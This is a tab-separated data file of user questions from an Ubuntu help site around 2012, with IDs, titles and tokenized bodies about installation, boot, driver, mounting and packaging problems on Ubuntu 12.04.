161033	what are the benefits of a disk install vs. wubi ? and can i migrate my settings easily ?	i chose to do the wubi install because it was short , simple , and easy to reverse ( no messing with partitions required ) . to be honest , i can handle the lack of a hibernate function . i have n't really heard many other benefits of installing on a separate partition than hibernation and negligibly faster hard disk read/write . yet almost everyone i encounter seems to have opted for the disk installation . are there more benefits i should be aware of , especially as a college student who wants a fast , efficient machine for documents , web browsing , etc . ( nothing big like gaming , i can run that on windows ) ? also , i have a fair amount of settings and packages installed that i spent a bit of time on and would rather not have to do again . is there any way i can migrate all of these settings from the virtual disk on my c : / drive ( wubi installation ) to the disc installation in another partition ? ( i have a 16gb usb drive if that 'll do the trick )
161034	where is the directory for your web contents using lamp ?	okay , i have used xampp and apache on windows before , but i have never tried it on ubuntu ... on top of that , i am using ubuntu server with 12.04 with cli , no desktop environment or gui . i believe using x11 or a gui opens up various other vulnerabilities and exploits , and i am working on a little project with the server- i want to make it public , not just a local server ... back to the main problem- i have no idea where the directories are on lamp on ubuntu v12.04 . i searched but can not find myself . additionally , does anyone have an idea where it is for lighttpd ? this is just a bonus question , i am more worried about the lamp directories , but i may experiment with lighttpd instead later down the line .
161037	ubuntu wo n't log in after update	i just updated ubuntu about 15 minutes ago on my desktop which is running 12.04 . within the set of updates , there were some kernel upgrades . it did n't say i needed to reboot after the update was finished , but i thought i would anyway . the computer successfully rebooted up to the login screen . however , after entering my password , the screen goes black for a moment , then it comes back to the login screen . i tried the suggestions in this question , but unfortunately they did n't help . in the accepted answer , the questioner vaguely says it was a `` unity problem '' . i 'm using gnome-classic with full compiz effects . i tried uninstalling and reinstalling compiz , but that did n't fix anything . so ... i ca n't use my desktop computer until this is fixed . i hope there is some help soon . i 've uploaded the output of cat /var/log/xorg.0.log to pastebin . a temporary solution of changing to gdm instead of lightdm was found with help in the chat room .
161044	how much time is needed to get an app reviewed ?	i pushed my app for the showdown contest and i 'm curious to know how much time is needed before it get reviewed
161046	setting nomodeset ( vesa graphics mode ) through grub shell	i 'm installing ubuntu desktop amd64 . i 've previously done this on the same system with the alternate iso install because it uses a text base installer . however , i 'm having problems with that install so it was suggested to me that i try the regular desktop install . the problem is that i 'm using internal graphics that ubuntu installer does not support . so i get an initial install prompt and then my monitor turns off as the install runs . the only thing i have access to is a grub shell . i can cat the /boot/grub/grub.cfg file . i think there are some options similar to `` nomodeset '' that can force the installer to use vesa graphics that will allow me to continue the install . does anyone know how/where to edit these options through grub ? ( this question is related to dual boot installing ubuntu 12.04 with windows 7 ( 64 ) on a non uefi system ) thanks
161054	how do i merge a free space of 30g in the logical drive into the d drive ?	the 30g space was first created from d drive for installing ubuntu ( wubi ) , and now i have already formatted the volume , and even deleted it , but the space is still there . what should i do to have that 30g merged to the d drive ? i really need that 30g in d ...
161058	canon mx 892 printer on usb recognized not working	on ubuntu 12.04 , trying to install a canon pixma mx892 printer , connected by usb cable . ubuntu now recognizes printer ( as canon mx880 series fax ) , but printing test page goes nowhere except endless `` processing - rendering completed '' .
161060	how do i install make ?	/usr/bin/perl install-module.pl -- all error : using install-module.pl requires that you install `` make '' . i need to install make on my ubuntu on aws ec2 . how can i do that ? i could finally install build-essential also successfully . # make make : *** no targets specified and no makefile found . stop .
161063	need ubuntu 11.10 download link	i 've been trying to install oracle 11gr2 in ubuntu 12.04 and am encountering lots of errors , but this has n't happened in the case of ubuntu 11.10 . currently i am trying to download ubuntu 11.10 but i am unable to find the link . can you guys please help me ?
161066	how do i add vlc to music menu along with banshee and others ?	i use vlc player more often than banshee , so is there any way to make vlc appear in music menu ?
161068	package sun-java6-jre needs to be reinstalled	i installed jre 1.6u33 , and there was a screen that came up asking me to accept the terms of service . i did n't know how , so i closed out of that screen without pressing ok. now , i ca n't install anything through the software center , or the terminal . the terminal gives an error message like this : e : the package sun-java6-jre needs to be reinstalled , but i ca n't find an archive for it . what are my options ? is there any way that i can re-open the window so i can accept the terms of service this time ?
161071	help with partition for ubuntu 12.04	i have an alienware m14x with 8 gb ram . i am thinking of installing ubuntu 12.04 lst using about 30 gb space on my hard drive . i am not use about how much of each partition i should do ( / , /home , /boot , swap , etc ) . i am going to share a drive from windows 7 which is about 550 gb ( has games , documents , programming documents ( java , python , etc ) , music & downloads ( torrents & download manager ) ) . if 30gb seems too low/high , then do n't hesitate to throw your suggestions . i 'd only use ubuntu for programming & some media use ( movies , music ) please i need suggestions asap ! any help should be appreciated ! thank you in advanced .
161074	i unexpetedly deleted administrator account and the other accounts are asking root password	i unexpectedly deleted my user account ( the only administrator for the machine ) . i have another account which is standard account now i cant access my hard disk or anything with that standard account it is asking for boot password . is there any way i can get back access to the administrator account ?
161079	how can i search files on ubuntu ?	how can i search files on ubuntu ? ? ? the usual search tool does not find anything . i have installed tracker search tool and it too does not find anything .i tried to follow the instructions found to enable this tool by going to system > > preferences > > searching and indexing but where the hell is system > > preferences > > searching and indexing ? i found a program called searching and indexing but it does not contain anything that is described in the instructions .
161082	how do i sort firefox bookmarks alphabetically by manipulating the 'json ' or 'places.sqlite ' files via the terminal ?	is there a way possible with terminal pipelining to sort the bookmarks mozilla firefoxstores in alphabetical order ? i tried dabbing a little but to my disappointment , the bookmarks are stored in json format , how do you extract things from that ?
161084	is there any software to create doodles like doodlinator for windows 8 ?	i need a software to create doodle animations just like the doodleinator in windows 8 which is very easy to use . please give some suggestions . thanks !
161092	why does quickly package -- extras fail ( where quickly package does n't ) ?	when i attempt to use quickly package -- verbose -- extras on my application i get these errors at the end : sed -i `` s|__soundboard_data_directory__ = . *|__soundboard_data_directory__ = '/opt/extras.ubuntu.com/soundboard/share/soundboard/'| '' debian/soundboard/opt/extras.ubuntu.com/soundboard/soundboard*/soundboardconfig.py sed : ca n't read debian/soundboard/opt/extras.ubuntu.com/soundboard/soundboard*/soundboardconfig.py : no such file or directory make [ 1 ] : *** [ override_dh_install ] error 2 make [ 1 ] : leaving directory `/home/pablo/soundboard' make : *** [ binary ] error 2 dpkg-buildpackage : error : fakeroot debian/rules binary gave error exit status 2 i have n't a clue what is wrong here . when i run package -- extras on a clean template it runs fine . soundboardconfig.py is an unmodified appnameconfig.py the template makes . i 'm not sure if my full source code is needed for this or not , but can be provided . edit : forgot to mention quickly package creates a working package , only -- extras fails .
161103	system boots with brightness level set to the lowest setting	after selecting the os to load with grub , 12.04 boots to a dark screen . it seems a minor problem , because i only have to press the brightening key on may keyboard to cast some light . but every single time i reboot , the dark screen returns . is there a workaround for this ?
161104	ubuntu how do i install make	/usr/bin/perl install-module.pl -- all error : using install-module.pl requires that you install `` make '' . i need to install make on my ubuntu on aws ec2 . how can i do that ? i could finally install build-essential also successfully . # make make : *** no targets specified and no makefile found . stop .
161107	desktop recording software with keypressing hints	i am looking a desktop recording software like democreator , which can automatically create tool tips of the input key pressed in the video being recorded , such as when i press alt+tab , it creates a tooltip as `` entered alt+tab '' or like . the question is : is there something equivalent in ubuntu or linux ? also i do n't want to use windows software via wine . update : one answerer tell about keymon . thanks . but it was not what i was looking for . that software runs in the screen blocking some part , and also i wanted a tooltip like feature which will be displayed in the video only .
161108	unable to mount an lvm hard-drive after upgrade	i imagine this is a basic gotcha ... but i ca n't see it . i have a system with 2 ( physical ) harddrives . the boot system ( /dev/sda ) was running 10.04 & the second drive ( /dev/sdb ) was just a mounted filesystem . i did a clean load of ubuntu 12.04 overwriting /dev/sda ( not an upgrade ) & now can not mount the second drive . so i do not know what to enter it into the fstab ... i had expected to use : /dev/sdb /tera ext4 defaults 0 2 but even manual mounting fails ( i also have tried various `` -t '' options on the off chance ! ) sudo mount -t ext4 /dev/sdb1 /tera mount : wrong fs type , bad option , bad superblock on /dev/sdb1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so output from disk queries indicate that it is a linux lvm & a healthy disk still . sudo lshw -c disk *-disk:0 description : ata disk product : wdc wd5000aacs-0 vendor : western digital physical id : 0 bus info : scsi @ 2:0.0.0 logical name : /dev/sda version : 01.0 serial : wd-wcasu1401098 size : 465gib ( 500gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=00015a55 *-disk:1 description : ata disk product : wdc wd10eads-00l vendor : western digital physical id : 1 bus info : scsi @ 3:0.0.0 logical name : /dev/sdb version : 01.0 serial : wd-wcau47836304 size : 931gib ( 1tb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 sudo fdisk -l disk /dev/sda : 500.1 gb , 500106780160 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976771055 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00015a55 device boot start end blocks id system /dev/sda1 * 2048 972580863 486289408 83 linux /dev/sda2 972582910 976769023 2093057 5 extended /dev/sda5 972582912 976769023 2093056 82 linux swap / solaris disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 1 1953525167 976762583+ 8e linux lvm lvm does n't appear to be an option for mount or fstab . ... and here 's a smart data screenshot from disk utility .
161109	what difference between daily build and alpha 2 ( 12.10 ) ?	i have went into 12.10 ubuntu website but have 2 vision , one is daily build another one is alpha 2 . what difference between daily build and alpha 2 ( 12.10 ) ? which one i should download ?
161113	ubuntu boots to terminal on start up	for a long time i 've been unable to get updates due to a `` repositories not found '' error . yesterday someone fixed this for me but after installing 94 days worth of updates my system wanted to restart . it looks like it is booting normally but then it opens a terminal and asks for my login and password . i had tried ctrl+ alt +f7 and startx to no avail . here is everything that appears on screen when i turn the computer on . ubuntu 10.04.4 lts box-o-doom tty1 box-o-doom login : julian password : last login : sun jul 8 10:28:02 bst tty1 linux box-o-doom 2.6.32-41-generic-pae # 91-ubuntu smp wed jun 13 12:00:09 utc 20 12 i686 gnu/linux ubuntu 10.04.4 lts welcome to ubuntu ! *documentation : http : //help.ubuntu.com julian @ box-o-doom : ~ $ _ i then tried dmesg which produced hundreds of lines all very similar to the first line reproduced here [ 9.453119 ] type=1505 audit1341742405.022:10 ) : operation= '' profile_replace '' pid=743 name= '' /usr/lib/connman/scripts/dhclient-script '' follwed by this at the end [ 9.475880 ] alloc irq_desc for 27 on node-1 [ 9.475883 ] alloc kstat_irqs on node-1 [ 9.475890 ] forcedeth 0000:00:07.0 : irq27 for msi/msi-x [ 9.760031 ] hda_code : alc662 rev1 : bios auto-probing . [ 10.048095 ] input : hda digital pcbeep as /devices/pci 0000:00:05.o/inp ut/input6 [ 10.862278 ] ppdev : user-space parallel port driver [ 20.268018 ] eth0 : no ipv6 routers present julian @ box-o-doom : ~ $ _ results of startx lots of text scrolls off the screen and i have no way of reading it . but everything i can see is reproduced below current version of pixman : 0.16.4 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version markers : ( -- ) probed , ( ** ) from config file , ( == ) defult setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational . ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : sun jul 8 12:02:23 2012 ( == ) using config file : `` /etc/x11/xorg.conf '' ( == ) using config directory : `` /usr/lib/x11/xorg.conf.d '' fatal : module nvidia not found . ( ee ) nvidia : failed to load the nvidia kernal module please check your ( ee ) nvidia : systems kernal log for aditional error messages . ( ee ) failed to load module `` nvidia '' ( module specific error , 0 ) ( ee ) no drivers available . fatal server error : no screens found please consult the x.org foundation support at http : //wiki.x.org for help please also check the log files at `` /var/log/x.org.0.log '' for aditional informati on ddxsiggiveup : closing log giving up xinit : no such file or directory ( errno 2 ) : unable to connect to x server xinit : no suck process ( errno 3 ) : server error julian @ box-o-doom : ~ $ _
161124	why does 'quickly package ' fail with `` an error has occurred when creating debian packaging '' ?	i 've got a big problem with packing my quickly application for the ubuntu app showdown . when i try to package or submit my application , i get some warnings : quickly package -- verbose ... ... .. -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- warning : syntax errors in facebook/facebookwindow.py : encoding declaration in unicode string ( facebookwindow.py , line 0 ) warning : the following files are not recognized by distutilsextra.auto : authors~ facebook/aboutfacebookdialog.py~ facebook/facebookwindow.py~ facebook/preferencesfacebookdialog.py~ facebook/__init__.py~ facebook_lib/aboutdialog.py~ facebook_lib/builder.py~ facebook_lib/preferencesdialog.py~ facebook_lib/window.py~ facebook_lib/__init__.py~ facebook_lib/facebookconfig.py~ facebook_lib/helpers.py~ setup.py~ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- an error has occurred when creating debian packaging error : ca n't create or update ubuntu package error : package command failed aborting what does the second warning mean ? how do i solve those warnings ? i want to submit my app to the ubuntu app developer showdown into my ppa and it does n't work . thanks for any answer .
161125	subscript in glade	how can i format a text with subscript in glade ? i want to display a text with a formular such as h2o . thanks
161128	when exactly will the app showdown stop accepting submissions ?	it is not quite obvious if there is official time until which app submission still be accepted : ) according to rules : youâve got 3 weeks to develop a new app , until the 9th july 2012 countdown widget , right now , says 1 day 10:11:47 : http : //developer.ubuntu.com/showdown/
161140	what 's the download size of the ubuntu-restricted-extras package ?	just wondering what the download size of the 'ubuntu-restricted-extras ' package is ?
161141	what is the remaining time for ubuntu app showdown ?	here ( http : //developer.ubuntu.com/showdown/ ) it says 1 day 09:32:20.. so 1 day and 9 hours or 9 hours ? i am asking because today is sunday ...
161146	problem with automatically booting	after upgrade from ubuntu 11.10 to 12.04 i am unable to get ubuntu to automatically boot . even when i set grub.cfg as follows : grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=2 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet '' grub_cmdline_linux= '' '' when rebooting , grub waits on its splash screen for keypressing on selected kernel . please help if you have any idea . i updated a grub by update-grub command with different timeout but it does not change .
161148	where did the sharing options from nautilus go ?	today i wanted to share trough my home network some files with my father 's laptop who happens to be running windows . i remember there was a 'sharing options ' in nautilus when right clicking on a folder but i must have removed some packaged that removed it as well . how can i restore it ?
161149	large uploaded file wo n't display in ubuntu one but is included in file usage	on ubuntu 10.04 , i uploaded a single 711 mb . my total file usage in ubuntu one went up to 877mb , which is about right , but the file does n't show in ubuntu one so i ca n't download or delete it . either the file is there and i ca n't see it for some reason . or the file is not there and the total file usage figure is wrong . does anyone know what has happened ? i have a free account but am well below my 5gb limit .
161151	installing windows after ubuntu is installed ( need to create ntfs partition too )	i prefer ubuntu to work on , but for some applications for school , i need windows . i 've done some research and have a few problems : i only have one hard drive which is formatted as ext4 , not ntfs . many people say i have to use gparted to create an ntfs partition to install windows on , the only problem is that i need to unmount my drive to do this , which is n't possible i think because i only have one . i thought about mounting my hdd as a slave on a windows laptop but i do n't manage to partition it with windows partition manager , so i think i need some kind of tool . which one ? next problem i 'll probably have is that i wo n't be able to boot ubuntu after installing windows because grub will be removed from my mbr . are there any good guides around here ? i 've used some kind of tool before , but it crashed my whole hdd so i had to fully format it .
161153	ubuntu 12.04 takes too long to boot	i 've recently encountered the following error message : mount : mounting /dev/disk/by-uuid/3f7f5cd9d-6ea3-4da7-b5ec-**** on /root failed : invalid argument mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target file system does n't have /sbin/init . no init found . try passing init= bootarg . busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) _ i run sudo fsck /dev/sda2 which is the ubuntu ext4 root partition via livecd . it checked and fixed the file system . the next time i boot , ubuntu started to load with the ubuntu logo and the dots underneath for several hours ( with the mouse pointer active on the screen ) , i even let the computer on overnight but still it did not successfully boot or got to the login screen in the morning . i booted again with the livecd and checked the ntfs partitions with ntfsfix and again the ntfs partitions was checked and fixed successfully . i also edited my fstab and commented out the lines that auto-mounts the ntfs partitions . the next time i boot , it took almost 20 minutes for ubuntu to get to the login screen , after typing the password it took an additional 10 minutes for ubuntu to get to the desktop . on the desktop , it take several minutes to open any program , displaying the dash alone takes 5 minutes ! is there a fix for this without having to reinstall ubuntu ? i do n't see or get any errors , ubuntu is just taking too long to boot and to run programs . please help !
161155	how to create a ppa for c++ program ?	my questions are : c++/gtkmm project created with netbeans . how to make package to ppa from this ? i have created target files structure ( *.desktop , iconfile , ui glade files ) . binary goes to /opt/extras.ubuntu.com/myagenda/bin/myagenda . there is also a folder of glade files , that must go to /opt/extras.ubuntu.com/myagenda/bin/myagenda/ui . desktop file goes to /usr/share/applications/myagenda.desktop . icon goes to /usr/share/icons/hicolor/scalable/apps/myagenda.svg as you see , there is really small amount of files . now , how to manage all this stuff , to create package on ppa , which knows where and how put this files to their targets ? ├── opt │ └── extras.ubuntu.com │ └── myagenda │ ├── bin │ │ └── myagenda │ └── ui │ ├── item_btn_delete.png │ ├── item_btn_edit.png │ ├── myagenda.png │ ├── myagenda.svg │ ├── reminder.png │ └── ui.glade └── usr └── share ├── applications │ └── myagenda.desktop └── icons └── hicolor └── scalable └── apps └── myagenda.svg update : created install file in debian directory with targets : data/myagenda /opt/extras.ubuntu/com/myagenda/bin data/ui/* /opt/extras.ubuntu/com/myagenda/ui data/myagenda.desktop /usr/share/applications data/myagenda.svg /usr/share/icons/hicolor/scalable/apps after dpkg-buildpackage it builds , but for amd64 architecture . now , trying to change that to i386 .
161156	ca n't disable giant cursors ( from accessibility mode )	i 've just installed ubuntu 12.04 from a livecd . out of curiosity , i enabled the accessibility options for people who are hard of sight . as you can guess this does the usual stuff of inverting colours , increasing text size and making the cursor larger . having finished the installation i booted into the new system to find accessibility mode was still installed . from the lightdm login screen i disabled this which switched colours and text size back to default , however it 's only the pointer cursor that has gone back to default . to put it another way , the `` hand '' icon that you get when hovering over a link , the cursor which appears when typing and pretty much every other cursor on the system are still large . i 've looked on the universal access menu , but there 's no option to disable large cursors . i 've tried toggling accessibility on and off but to no avail .
161165	flash plug-in crashes about 50 % of the time	like the title says , my flash plugin keeps crashing . it happens on videos on many sites like youtube . ( i joined the html5 beta at youtube to sort that out , but that does n't fix other sites . ) the crash seems to occur on any site using adobe flash , and is becoming very annoying . i 'm using 12.04 with firefox and used the flash-helper plug-in as well but the same result .
161166	uninstallation trouble ( wubi windows 7 )	i recently installed ubuntu as a second boot option on my windows 7 system . i had a difficulty on boot ubuntu so i tried to uninstall it through control panel . i could n't find any ubuntu program on control panel so i formatted the partition in which ubuntu was installed . now my problem is that ubuntu is shown on my boot screen ( although it is deleted ) . is there any way to fix this issue ? btw ubuntu boot option is shown twice because of an other attempt to uninstalling it . this issue is bugging me for a week now !
161169	why did wubi install gnome when i gave it the xubuntu iso ?	i downloaded the xubuntu iso file from the official site . but after installing it through the wubi installer i still got gnome interface instead of xfce . what 's gone wrong ? what should i do ? i double checked the file .
161170	why is my streaming video so choppy ?	i am new to ubuntu and have installed the most recent copy of ubuntu 64bit . i also have a relatively new nvidia video card , geforce 210 1gb ddr3 . i have downloaded the drivers for linux from nvidias web site , will this fix the problem and also i am not sure how to install them as well .
161183	unwanted application icons showing on unity taskbar	i installed my ubuntu 12.04 desktop after a dependency loop hell . after i re-installed the unity panel shows all application icons whenever the app is loaded . for example i can now always see vmware and x-chat where on every previous install these icons never showed no matter how much i wanted them too sometimes . these indicators are starting to fill up my taskbar and was wondering how to make them go away . for example i want thunderbird , empathy and x-chat to be able to be closed to the messaging menu like they did in all my other previous installs . also i have x-chat indicator installed but it will not allow me to close to messaging menu - i have to have the indicator icon enabled in order to close it . any assistance in these issues would be greatly appreciated .
161186	g++ can not find include files ( qt3 )	allan @ allan-virtualbox : ~/blackjack_for_the_hopelessly_luckless $ make g++ -c -pipe -g -wall -w -o2 -d_reentrant -dqt_no_debug -dqt_thread_support -dqt_shared -dqt_tablet_support -i/usr/share/qt3/mkspecs/default -i . -i . -i/usr/include/qt3 -o advicewindow.o advicewindow.cpp advicewindow.cpp:32:19 : fatal error : qwidget : no such file or directory compilation terminated . make : *** [ advicewindow.o ] error 1 allan @ allan-virtualbox : ~/blackjack_for_the_hopelessly_luckless $ qt3 was installed using apt-get . header files are located in /usr/include/qt3/ is there a g++ config file or something i need to update ? i 'm new to compiling from source and not sure what to do . makefile was created using qmake from project file . files in include directory are all lower case , should i change the code in advicewindow.cpp to qwidget.h ? any help appreciated . thanks . here are the includes in advicewindow.cpp # include < qwidget > # include < qlabel > # include < qpixmap > # include < qhboxlayout > # include < qvboxlayout > # include < qpushbutton > # include < qmessagebox > # include < cstdlib > # include < ctime > # include `` blackjack.h '' # include `` deck.h '' # include `` player.h '' # include `` dealer.h '' # include `` advicewindow.h '' # include `` jinxwindow.h '' perhaps i am missing a qt development package that provides the includes ? after some searching i found that the folder /usr/include/qtgui/ is missing . this folder should contain the necessary files . i have qt3 and qt3-dev-tools installed as well as qtcreator . where can i get the missing folder/files ?
161187	why is my machine unable to mount my smb drives ( `` cifs vfs : error connecting to socket . aborting operation '' , return code -115 ) ?	i have a machine running precise ( 12.04 x64 ) , and i can not mount my smb drives ( i have 3 , we 'll call them public , private and download ) . it used to work ( a week or two ago ) and i did n't touch fstab ! the machine hosting the shares is a commercial nas , and i 'm not seeing anything that would indicate it 's an issue with the nas . i have an older machine which i updated to precise at the same time ( both fresh installed , not dist-upgrade ) , so should have a very similar configuration . it is not having any problems . i am not having problems on windows machines/partitions either , only one of my precise machines . the two machines are using identical entries in fstab and identical /etc/samba/smb.conf files . i do n't think i 've ever changed smb.conf ( has never mattered before ) . my fstab entries all basically look like this : //10.1.1.111/public /media/public cifs credentials=/home/downbeat/.credentials , iocharset=utf8 , uid=downbeat , gid=downbeat , file_mode=0644 , dir_mode=0755 0 0 here 's the dmesg output on boot : [ 51.162198 ] cifs vfs : error connecting to socket . aborting operation [ 51.162369 ] cifs vfs : cifs_mount failed w/return code = -115 [ 51.194106 ] cifs vfs : error connecting to socket . aborting operation [ 51.194250 ] cifs vfs : cifs_mount failed w/return code = -115 [ 51.198120 ] cifs vfs : error connecting to socket . aborting operation [ 51.198243 ] cifs vfs : cifs_mount failed w/return code = -115 there are no other errors i see in the dmesg output . originally when i ran 'testparm -s ' , the output contained these lines error : lock directory /var/run/samba does not exist error : pid directory /var/run/samba does not exist here 's the samba related programs i have installed : $ dpkg -- list|grep -i samba ii libpam-winbind 2:3.6.3-2ubuntu2.3 samba nameservice and authentication integration plugins ii libwbclient0 2:3.6.3-2ubuntu2.3 samba winbind client library ii nautilus-share 0.7.3-1ubuntu2 nautilus extension to share folder using samba ii python-smbc 1.0.13-0ubuntu1 python bindings for samba clients ( libsmbclient ) ii samba-common 2:3.6.3-2ubuntu2.3 common files used by both the samba server and client ii samba-common-bin 2:3.6.3-2ubuntu2.3 common files used by both the samba server and client ii winbind 2:3.6.3-2ubuntu2.3 samba nameservice integration server $ dpkg -- list|grep -i smb ii dmidecode 2.11-4 smbios/dmi table decoder ii libsmbclient 2:3.6.3-2ubuntu2.3 shared library for communication with smb/cifs servers ii python-smbc 1.0.13-0ubuntu1 python bindings for samba clients ( libsmbclient ) ii smbclient 2:3.6.3-2ubuntu2.3 command-line smb/cifs clients for unix ii smbfs 2:5.1-1ubuntu1 common internet file system utilities - compatibility package $ dpkg -- list|grep -i cifs ii cifs-utils 2:5.1-1ubuntu1 common internet file system utilities ii libsmbclient 2:3.6.3-2ubuntu2.3 shared library for communication with smb/cifs servers ii smbclient 2:3.6.3-2ubuntu2.3 command-line smb/cifs clients for unix i originally noticed that my other machine had `` libpam-winbind '' and `` nautilus-share '' installed and the machine with the issue did not . installing those two packages solved my errors with 'testparm -s ' , but did not fix my issue . finally , i tried to purge and reinstall these packages smbclient smbfs cifs-utils samba-common samba-common-bin still no luck . again , it used to work ; now it does n't . very similarly configured machine works ( but some packages are out of date on the working machine ) . the nas has only one interface/ip address , nmblookup works to find it 's ip from it 's hostname ( from the machine with the issue ) and it responds to a ping . please any help would be great . i 've been searching on askubuntu , superuser , ubuntuforums and plain old search engines for a week now and it 's driving me crazy !
161188	unable to stop toshiba transmemory	i have a usb , when i choose safety remove , occur this error message.how to solve the problem ? unable to stop toshiba transmemory error detaching : helper exited with exit code 1 : detaching device /dev/sdb usb device : /sys/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.2 ) synchronize cache : synchronize cache ( 10 ) : fixed format , current ; sense key : key=9 additional sense : logical unit not ready , cause not reportable info fld=0x0 [ 0 ] failed : no such file or directory ( continuing despite synchronize cache failure . ) stop unit : start stop unit : transport : host_status=0x07 [ did_error ] driver_status=0x00 [ driver_ok , suggest_ok ] failed : no such file or directory
161190	how to get verbose output on ubuntu server while booting ?	there is no output form the init scripts on ubuntu server . https : //bugs.launchpad.net/ubuntu/+source/upstart/+bug/542666 is there any workaround ? such as installing plymouth or anything else ?
161192	how do i move the close and maximise buttons in gnome shell ?	i would like my window buttons to be elementary like with the close button on the left and maximise on the right with no minimise button . gnome tweak tool seems to only allow me to move all buttons , not individual buttons . how can i achieve this ? thanks
161194	how to build an `` orignal '' ubuntu installer/live iso image ?	where to i find the scripts to bootstrap and create an normal ubuntu installer/live iso image ? or in other words , how are the ( x ) ubuntu default installer/live images build ?
161198	problems compiling with quickly	welcome to another of my questions about compiling ! : p so , after days of stress trying to compile my app , first manually , after porting the project to quickly , i decided to create the project from scratch using this time quickly . now i 've finished the app , it works great using quickly run and i have n't added any new file , just removed , replaced or modified . but it ca n't be compiled using quickly package -- verbose -- extras ... why , if there does n't seems to be errors related with my project ? the fail happens because python-mkdebian does n't haves enough parameters to work . the terminal output ( in spanish ) : running install_egg_info writing /tmp/tmpst6pms/virtuam-0.1.egg-info warning : the following files are not recognized by distutilsextra.auto : help/c/figures/icon.png help/c/index.page help/c/preferences.page help/c/topic1.page virtuam.desktop.in traceback ( most recent call last ) : file `` /usr/bin/python-mkdebian '' , line 368 , in < module > egg = get_egg_info ( ) file `` /usr/bin/python-mkdebian '' , line 35 , in get_egg_info k , v = l.strip ( ) .split ( ' : ' , 1 ) valueerror : need more than 1 value to unpack ha ocurrido un error al crear el paquete debian error : no se puede crear o actualizar paquete ubuntu error : la orden package ha fallado cancelando
161199	removing crossover games from unity start panel	i 'm new to ubuntu and recently installed crossover games trial on ubuntu 12.04 , did n't like it , tried to uninstall it but simply refused to go away , so i just went on and deleted the folders in the file system . problem is that now there are 4 icons left on the unity start panel under `` installed applications '' , and i donâ´t know how to remove it . actually , could anyone tell me how to delete any shortcut that is created on the start panel ? is there a way to do it ? thank you very much !
161201	clock settings are disabled from time & date settings	in my time & date settings clock settings seems to be disable . which default package is missing on my system ?
161203	using mce remote at unity greeter ?	is there any way to get lightdm to see a mce remote as an input device at the greeter screen ? i have three accounts -- my user account , mythtv , and xbmc and i 'd like to be able to switch between these using a remote . i 've made the following change to my xorg.conf : section `` inputclass '' identifier `` remote '' matchdevicepath `` /dev/input/event2 '' option `` ignore '' `` true '' endsection and x.org sees the remote : # cat /var/log/xorg.0.log | grep media |grep input |grep event [ 354591.052 ] ( ii ) config/udev : adding input device media center ed . ehome infrared remote transceiver ( 0471:060c ) ( /dev/input/event2 )
161204	should i down-grade the version of ubuntu on my computer ( 12.04 ) ?	i 've been having problems with terminal finding directories and packages on my computer & i 'm not the only one . aderojas has/had the same issue see link : apt-get not finding packages i have tried every suggestion on this post & got the response : no such file or directory or some such similar response ... i 'm thinking that others are successfully using these functions , why ca n't i ? is there some bug that needs to be worked out ? are others on a different version of ubuntu successful running these processes ? maybe installing a different version of ubuntu will solve these issues ? ? ? how should i proceed ? thanx in advance !
161205	set dependencies in quickly	as my app for the developer showdown , virtuam , is a gui assistant for qemu , i need to indicate to quickly that qemu should be installed in ubuntu . however , there does n't seems to be any option available in setup.py . then , how can i select the dependencies in a quickly project ?
161208	no video skype found	i 've been looking for skype for ubuntu 12.04 and all i can do with the downloads i 've found is skype without video call , just voice call . please help .
161213	wireless interface wifi0 not present	i have lenovo z575 and problems with wifi connection . after a short battle with drivers , and eventually installing ndiswrapper and windows drivers , wifi0 interface does not show up in the ifconfig ... ifconfig -a gives only lo and eth0 . although , wireless hardware is presend ; lspci gives 02:00.0 network controller : ralink corp. rt3090 wireless 802.11n 1t/1r pcie simple ifup wifi0 gives ignoring unknown interface wifi0=wifi0 . any idea how to fix wifi ? edit rfkill unblock all does not help
161220	xubuntu 12.04 hangs when sleeping the second time	after booting my machine , it 's able to suspend correclty the first time , with the power button flashing slowly . i 'm able to hit the button and have it come back on . the second time however , seems to never get all the way to sleep , i 'll just come in to find a blank screen with the power button showing a steady light , and i have to do a hard reboot to get it back . running xubuntu 12.04 , 3.2.0-25-generic kernel , p67a-g43 motherboard with 2600k processor .
161222	system low graphic error , asking for some command to fix it	while running ubuntu 12.04 amd64 from usb in safe mode it shows an error that says the system system running in low graphics mode . when i click to reconfigure low graphics mode it prompts : ubuntu @ ubuntu : it asks for some command . what should i do ? i am a complete beginner on the linux platform . should i install it without fixing the graphics , or should i solve the graphics problem before installing ?
